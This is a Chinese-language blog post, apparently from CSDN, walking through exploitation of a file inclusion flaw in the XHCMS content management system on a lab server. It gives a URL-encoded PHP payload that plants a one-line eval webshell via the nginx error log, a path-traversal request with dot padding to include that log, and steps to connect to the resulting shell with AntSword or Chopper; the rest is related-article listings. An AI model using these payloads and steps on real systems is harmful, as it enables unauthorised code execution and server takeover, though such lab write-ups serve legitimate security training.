任意文件包含漏洞(3)——实战xhcms

最新推荐文章于 2024-05-12 20:37:13 发布
最新推荐文章于 2024-05-12 20:37:13 发布
阅读量3.6k 收藏 2
点赞数 2
分类专栏: web渗透 文章标签: 文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45663905/article/details/108148898
版权

目录

错误日志

nginx的默认日志文件是phpstudy/nginx/logs/error.log

apache的日志文件是phpstudy/apache/logs/error.log
一般管理员都不会改的
这里我用的是nginx
在这里插入图片描述

演示

进入网站首页
在这里插入图片描述

在url后面加上<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?>
或者其他的一句话木马

http://172.16.11.27/xhcms/%3C?php%20fputs(fopen(%27data2.php%27,%27w%27),%27%3C?php%20eval($_POST[123])?%3E%27);?%3E

在这里插入图片描述
查看日志文件

http://172.16.11.27/xhcms/?r=../../../nginx/logs/error.log...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

在这里插入图片描述
经过代码审计,这里还需要使用.,路径长度绕过

在这里插入图片描述

发现
index.php的同目录下生成了data2.php文件

在这里插入图片描述
用蚁剑或者菜刀连接该文件

http://172.16.11.27/xhcms/data2.php

在这里插入图片描述

资源下载

至少有一个任意文件包含漏洞的cms 下载链接

ihszg
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
【网络安全】xhCMS代码审计思路
HBohan的博客
11-02 1157
前言 最近想提升一下自己的代审能力,虽然之前复现分析了挺多漏洞的,TP,Laravel,Typcho,yii,但一直感觉对代码审计能力提升用处不太大,很多时候链子和利用点都非常简单,可是如何发现的这确实一个难题,所以就拿熊海CMS为例,如何自己挖它里面的漏洞,看看自己能否发现和利用,最后在和网上存在的漏洞进行对比,再看哪里没有发现,为什么没有发现,希望这也能给才入门代码审计的师傅们一点思路吧 【资料】 审计流程 先看一下入口文件index.php,这个文件一般会定义很多变量,包含很多路径,文件进来,我们只需
文件包含与PHP伪协议实战演练
墨子辰的博客
01-28 536
目录一、PHP中造成文件包含的四个函数二、本地文件包含、远程文件包含的区别三、PHP伪协议测试代码目标文件常用协议1、目录遍历获取flag2、php://input、php://filter3、file://4、data://5、zip:// 一、PHP中造成文件包含的四个函数 1、include() 、require() 当使用include()函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 当使用require()函数包含文件时,只要
复现熊海cms漏洞
p_utao的博客
09-07 2702
前期准备
XHCMS靶场小记(熊海)
I_WORM的博客
01-19 971
根目录下的index.php文件;r参数用于获取包含文件的名字,如果没有给r参数赋值则执行file文件夹下的index.php文件,如果r有值则包含file文件夹下的对应php文件,没有则返回空。查看file文件夹下的index.php代码;该文件包含了template文件夹下的header.php文件;设置中图片水印位置上传时需要添加img_kg和ing_slt参数的数据;设置r参数(由于file下的一些文件中包含了header.php文件)即r参数不赋值的情况下也会存在文件包含漏洞
文件下载漏洞案例-xhcms
最新发布
c0529的博客
05-12 398
这个漏洞严格意义上利用的条件比较苛刻,但是我们还是可以借着这个漏洞学习一下文件下载漏洞的特点。
XHCMS渗透测试
kiihuang的博客
04-01 425
熊海网站渗透测试这次是黑盒渗透测试
$http在上传文件的同时传参数_[代码审计] xhcms 文件包含漏洞分析
weixin_42300099的博客
12-26 502
一、初识CMS:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能-目录结构:二、漏洞简介:程序直接将POST接收到...
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 514
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
XHcms
Yu3511606536的博客
06-22 849
代码审计:XHcms
xhcms靶场源码,无密码,解压即用
05-12
关于xhcms的建站源码,无毒无马,建议搭配我写的教程文章一起食用: https://blog.csdn.net/qq_51861517/article/details/138726553?spm=1001.2014.3001.5501 可用于文件包含等的漏洞实战
94xhcms v1.3
04-01
从文件名称列表"94xhcmsv1.3"来看,这很可能是该系统的完整安装包或者源码包,包含了所有必要的文件和资源,包括但不限于数据库连接文件、样式表(CSS)、JavaScript文件、图片、模板文件、后台管理界面文件以及核心...
xhcms_2014:新华网CMS改版DEMO【依赖node-server运行】
05-14
xhcms_2014 新华网CMS改版DEMO【依赖node-server运行】
94xhcms v1.3.rar
07-05
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 无限级分类,建立门户网站也轻而易举 模块化采集,一键实现远程文档本地化 集成自定义表单,满足各种交互应用 自定义可视化标签,模板风格随时更换 更多功能请下载体验... 安装方法:解压后直接运行install (如:127.0.0.1/install)进行安装。 切记,安装完毕后请手动删除 install 文件夹及其下所有文件。
94xhcms内容管理系统 1.3.rar
05-25
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 1.无限级分类,建立门户网站也轻而易举 2.模块化采集,一键实现远程文档本地化 3.集成自定义表单,满足各种交互应用 4.自定义可视化标签,模板风格随时更换
常见漏洞加固方案
09-26
常见漏洞加固方案
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
案例分析中,`xhcms`的文件包含跨站漏洞展示了如何通过URL和应用功能寻找XSS和包含漏洞;`earmusic`的文件下载漏洞说明了如何追踪数据源头并绕过过滤机制;`zzzcms`的文件删除RCE和模板解析代码执行漏洞则演示了如何...
94xhcms v1.3-ASP源码.zip
12-14
ASP源码,压缩包解压密码:www.cqlsoft.com
南邮杯CTF 文件包含漏洞实战
永远是少年
12-14 844
今天继续给大家介绍CTF刷题,本文主要内容是南邮杯CTF 文件包含漏洞实战。 一、题目简介 二、解题思路 三、解题实战
DVWA-File Inclusion实战篇--文件包含漏洞
weixin_58660073的博客
06-13 363
DVWA实战篇--文件包含漏洞 File Inclusion 漏洞介绍 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。对一个简单的 PHP 小程序来说,在不同的 PHP 脚本之间剪切或复制某一函数不是大问题, 但是当进入项目开发时,函数的数量将会变得相当庞大,并且函数具有较强的复杂性,这时你就会把它们保存到一个便于随时调用的函数库中,以便于该函数在整个项目中可以随时被调用。通常情况下这个函数库是一个文.
xhcms csrf漏洞
09-03
抱歉,我没有找到关于xhcms的csrf漏洞的引用内容。可能是因为这个漏洞没有被广泛报道或者没有相关的公开资料。如果您对xhcms的csrf漏洞感兴趣,我建议您参考安全专家、漏洞研究人员或安全社区的讨论和报告,以获取更多关于该漏洞的信息。同时,我也建议您在使用xhcms或其他网站建设框架时,注意及时更新和修补漏洞,以保护自己的网站安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【网络安全】xhCMS代码审计思路](https://blog.csdn.net/HBohan/article/details/121098795)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值